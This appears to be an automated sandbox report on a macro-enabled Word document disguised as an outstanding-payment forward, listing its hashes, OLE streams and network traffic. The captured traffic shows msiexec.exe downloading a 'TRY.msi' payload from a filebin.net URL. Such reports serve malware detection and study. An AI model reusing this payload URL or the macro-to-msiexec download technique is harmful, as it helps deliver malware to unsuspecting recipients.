  • Microsoft Word document (32009/1) 54.23%
  • Microsoft Word document (old ver.) (19008/1) 32.20%
  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:12543_0008858249_FWDOUTSTANDING_20200604.doc
File size:61952
MD5:090e1dfdcbf2185788ea14cd113cc39f
SHA1:6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
SHA512:d4c9b997909b7bfa87090204a4a97179e61c98c10be73000ec68e32af8feddee19ca8c2bc0e9bf9e3cf040d6e0f4f58f2e0f09eef2936528d1f34c506dbb2e98
SSDEEP:768:cAuIiy1a9Tq1aBs8jCjuHF7Y89AOEUYqyxrINSrCqxw+tCc27I/:cAFMm1aidiFk89ABrbr1xrt/2
TLSH:65535CDDF2C2C4BBE12942B5E983C7A6B3BC3E292D1293172574371F3C75924C661269
File Content Preview:........................>.......................h...........k...............g..................................................................................................................................................................................

File Icon

Icon Hash:e4eea2aaa4b4b4a4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "12543_0008858249_FWDOUTSTANDING_20200604.doc"

Indicators
Has Summary Info:
Application Name:Microsoft Office Word
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
Summary
Code Page:1252
Title:
Subject:
Author:
Keywords:
Comments:
Template:Normal.dotm
Last Saved By:
Revion Number:1
Total Edit Time:0
Create Time:2022-04-20 02:06:00
Last Saved Time:2022-04-20 02:06:00
Number of Pages:1
Number of Words:0
Number of Characters:1
Creating Application:Microsoft Office Word
Security:0
Document Summary
Document Code Page:1252
Number of Lines:1
Number of Paragraphs:1
Thumbnail Scaling Desired:False
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1773
General
Stream Path:Macros/VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:1773
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . k . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 1c 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 23 03 00 00 0b 05 00 00 00 00 00 00 01 00 00 00 bf 6b 0f 39 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114
General
Stream Path:\x1CompObj
File Type:data
Stream Size:114
Entropy:4.2359563651
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:4096
Entropy:0.229954151382
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 05 00 00 00 68 00 00 00 06 00 00 00 70 00 00 00 11 00 00 00 78 00 00 00 17 00 00 00 80 00 00 00 0b 00 00 00 88 00 00 00 10 00 00 00 90 00 00 00 13 00 00 00 98 00 00 00 16 00 00 00 a0 00 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:4096
Entropy:0.414636097734
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00
Stream Path: 1Table, File Type: data, Stream Size: 7133
General
Stream Path:1Table
File Type:data
Stream Size:7133
Entropy:5.86601132644
Base64 Encoded:True
Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
Stream Path: Data, File Type: data, Stream Size: 32978
General
Stream Path:Data
File Type:data
Stream Size:32978
Entropy:7.70790581307
Base64 Encoded:False
Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . C . . . " . . . . A . . . . . . . . . . . . . . . . . . . . . . t . h . a . i . . . . . . . . . . . . . . . b . . . 8 . . . . . . d . . A . . . a , . . m S . ? . . . . . . . . . . D . . . . . . . . n . . . . . . . d . . A . . . a , . . m S . ? . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . s R G B
Data Raw:d2 80 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 96 19 47 0e e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 46 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 22 00 00 00 04 41 01 00 00 00 05 c1 0a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 68 00
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367
General
Stream Path:Macros/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:367
Entropy:5.30381145663
Base64 Encoded:True
Data ASCII:I D = " { 0 6 2 5 E 4 4 A - E 7 6 5 - 4 1 C E - 9 D F D - C 3 4 7 3 6 B 7 5 A 4 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 2 6 B 2 3 E B 6 3 E B 6 3 E B 6 3 E B 6 " . . D P B = " D 7 D 5 3 2 A E 5 2 D 6 6 7 D 7 6 7 D 7 6 7 " . . G C = " E B E 9 0 E D A 2 3 D B 2 3 D B D C " . . . . [ H o s t E x t e n d e r I n f o ]
Data Raw:49 44 3d 22 7b 30 36 32 35 45 34 34 41 2d 45 37 36 35 2d 34 31 43 45 2d 39 44 46 44 2d 43 33 34 37 33 36 42 37 35 41 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
General
Stream Path:Macros/PROJECTwm
File Type:data
Stream Size:41
Entropy:3.07738448508
Base64 Encoded:False
Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2435
General
Stream Path:Macros/VBA/_VBA_PROJECT
File Type:data
Stream Size:2435
Entropy:3.97570851109
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513
General
Stream Path:Macros/VBA/dir
File Type:data
Stream Size:513
Entropy:6.23760719085
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . u a \\ d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . r . m . .
Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 75 61 5c 64 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
Stream Path: WordDocument, File Type: data, Stream Size: 4096
General
Stream Path:WordDocument
File Type:data
Stream Size:4096
Entropy:1.08065186697
Base64 Encoded:False
Data ASCII:. . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j D . D . . . . . . . . . . . . . . . . . . . . . . . . . . . & v S h & v S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:ec a5 c1 00 2d 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 44 1c 44 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 26 76 53 68 26 76 53 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Apr 20, 2022 09:18:54.811676979 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:54.811722994 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:54.811779022 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:54.816365957 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:54.816391945 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:54.923983097 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:54.924114943 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:54.933249950 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:54.933269024 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:54.933573008 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:55.139383078 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:55.278825998 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:55.322189093 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:55.339699984 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:55.339776993 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:55.339869022 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:55.354721069 CEST49173443192.168.2.22185.47.40.36
Apr 20, 2022 09:18:55.354753017 CEST44349173185.47.40.36192.168.2.22
Apr 20, 2022 09:18:55.506489992 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.506531000 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.506872892 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.507960081 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.507970095 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.731769085 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.731873989 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.740710974 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.740725040 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.741158962 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.756040096 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.798182964 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.807862997 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.853785038 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.853846073 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.853986979 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854008913 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.854023933 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.854063034 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.854067087 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854093075 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.854103088 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854110003 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.854116917 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854135990 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854147911 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854275942 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.854629040 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.899869919 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.899888992 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.899919987 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.899954081 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.899966002 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.899982929 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.900031090 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.900063038 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.900082111 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.900088072 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.900104046 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.900257111 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.900286913 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.900321007 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.900327921 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.900341988 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.900382042 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946157932 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946217060 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946270943 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946284056 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946296930 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946331978 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946362972 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946388006 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946394920 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946407080 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946578979 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946609020 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946611881 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946624041 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946633101 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946655035 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946814060 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946845055 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946863890 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.946870089 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.946892977 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947037935 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947072029 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947097063 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947105885 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947125912 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947277069 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947308064 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947338104 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947361946 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947463989 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947468996 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947501898 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947534084 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947551966 CEST49174443192.168.2.2287.238.33.8
Apr 20, 2022 09:18:55.947559118 CEST4434917487.238.33.8192.168.2.22
Apr 20, 2022 09:18:55.947577953 CEST49174443192.168.2.2287.238.33.8

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Apr 20, 2022 09:18:54.702529907 CEST5586853192.168.2.228.8.8.8
Apr 20, 2022 09:18:54.721021891 CEST53558688.8.8.8192.168.2.22
Apr 20, 2022 09:18:54.721606016 CEST5586853192.168.2.228.8.8.8
Apr 20, 2022 09:18:54.742054939 CEST53558688.8.8.8192.168.2.22
Apr 20, 2022 09:18:54.790144920 CEST4968853192.168.2.228.8.8.8
Apr 20, 2022 09:18:54.810780048 CEST53496888.8.8.8192.168.2.22
Apr 20, 2022 09:18:55.363713026 CEST5883653192.168.2.228.8.8.8
Apr 20, 2022 09:18:55.417620897 CEST53588368.8.8.8192.168.2.22
Apr 20, 2022 09:18:55.451881886 CEST5013453192.168.2.228.8.8.8
Apr 20, 2022 09:18:55.504235029 CEST53501348.8.8.8192.168.2.22

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Apr 20, 2022 09:18:54.702529907 CEST192.168.2.228.8.8.80xce22Standard query (0)filebin.netA (IP address)IN (0x0001)
Apr 20, 2022 09:18:54.721606016 CEST192.168.2.228.8.8.80xce22Standard query (0)filebin.netA (IP address)IN (0x0001)
Apr 20, 2022 09:18:54.790144920 CEST192.168.2.228.8.8.80x8e74Standard query (0)filebin.netA (IP address)IN (0x0001)
Apr 20, 2022 09:18:55.363713026 CEST192.168.2.228.8.8.80x5d20Standard query (0)situla.bitbit.netA (IP address)IN (0x0001)
Apr 20, 2022 09:18:55.451881886 CEST192.168.2.228.8.8.80x7edStandard query (0)situla.bitbit.netA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Apr 20, 2022 09:18:54.721021891 CEST8.8.8.8192.168.2.220xce22No error (0)filebin.net185.47.40.36A (IP address)IN (0x0001)
Apr 20, 2022 09:18:54.742054939 CEST8.8.8.8192.168.2.220xce22No error (0)filebin.net185.47.40.36A (IP address)IN (0x0001)
Apr 20, 2022 09:18:54.810780048 CEST8.8.8.8192.168.2.220x8e74No error (0)filebin.net185.47.40.36A (IP address)IN (0x0001)
Apr 20, 2022 09:18:55.417620897 CEST8.8.8.8192.168.2.220x5d20No error (0)situla.bitbit.net87.238.33.8A (IP address)IN (0x0001)
Apr 20, 2022 09:18:55.417620897 CEST8.8.8.8192.168.2.220x5d20No error (0)situla.bitbit.net87.238.33.7A (IP address)IN (0x0001)
Apr 20, 2022 09:18:55.504235029 CEST8.8.8.8192.168.2.220x7edNo error (0)situla.bitbit.net87.238.33.7A (IP address)IN (0x0001)
Apr 20, 2022 09:18:55.504235029 CEST8.8.8.8192.168.2.220x7edNo error (0)situla.bitbit.net87.238.33.8A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • filebin.net
  • situla.bitbit.net

HTTPS Proxied Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.2249173185.47.40.36443C:\Windows\System32\msiexec.exe
TimestampkBytes transferredDirectionData
2022-04-20 07:18:55 UTC0OUTGET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: filebin.net
2022-04-20 07:18:55 UTC0INHTTP/1.1 302 Found
Cache-Control: max-age=0
Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1
X-Robots-Tag: noindex
Date: Wed, 20 Apr 2022 07:18:55 GMT
Content-Length: 0
X-Varnish: 196823
Age: 0
Via: 1.1 varnish (Varnish/6.0)
Access-Control-Allow-Origin: *
Connection: close


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.224917487.238.33.8443C:\Windows\System32\msiexec.exe
TimestampkBytes transferredDirectionData
2022-04-20 07:18:55 UTC0OUTGET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: situla.bitbit.net
2022-04-20 07:18:55 UTC1INHTTP/1.1 200 OK
Content-Length: 491520
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2022 01:28:19 GMT
ETag: "260bec1b34ce96e5ed6c42d51e7146fb"
Cache-Control: max-age=30
Content-Disposition: filename="TRY.msi"
x-amz-request-id: tx000000000000000eebd7e-00625fb3df-3b49846f-default
Content-Type: application/msword
Date: Wed, 20 Apr 2022 07:18:55 GMT
Connection: close
